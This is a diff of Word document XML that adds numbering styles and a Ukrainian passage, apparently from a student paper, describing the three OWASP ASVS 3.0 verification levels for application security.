+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="54BF63B5"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="31EECCA0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
     <w:lvl w:ilvl="1">
@@ -20195,7 +21057,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -20308,7 +21170,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -20421,7 +21283,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -20538,19 +21400,25 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="5">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="6">
+  <w:num w:numId="7">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -20783,6 +21651,45 @@
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0028171A"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
+    <w:name w:val="apple-converted-space"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
+    <w:name w:val="keyword"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A01E89"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -21012,6 +21919,45 @@
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
       <w:sz w:val="16"/>
       <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0028171A"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
+    <w:name w:val="apple-converted-space"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
+    <w:name w:val="keyword"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A01E89"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -4019,17 +4019,584 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Вимоги до безпеки ПЗ відповідно до </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:ind w:left="1080"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Зг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> до стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">запропонованого організацією </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">можна виділити три </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>івні перевірки безпеки програмних додатків</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>1 призначений для всіх програм.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рівень </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3 для найбільш важливих додатків - додатків, які </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:strike/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>виконують високі операції значення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>, містять конфіденційні медичні дані, або будь-який додаток, яке вимагає високого рівня довіри.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Кожен рівень ASVS містить перелік вимог до безпеки. Кожна з цих вимог також може бути співставлена з функціями безпеки конкретних можливостей, які повинні бути вбудовані в програмне забезпечення розробниками.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4502638" cy="3101630"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="7" name="Рисунок 7" descr="Похожее изображение"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3" descr="Похожее изображение"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4502638" cy="3101630"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рівні </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -4047,6 +4614,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4059,38 +4627,380 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Класифікація аналізаторів вихідного коду</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
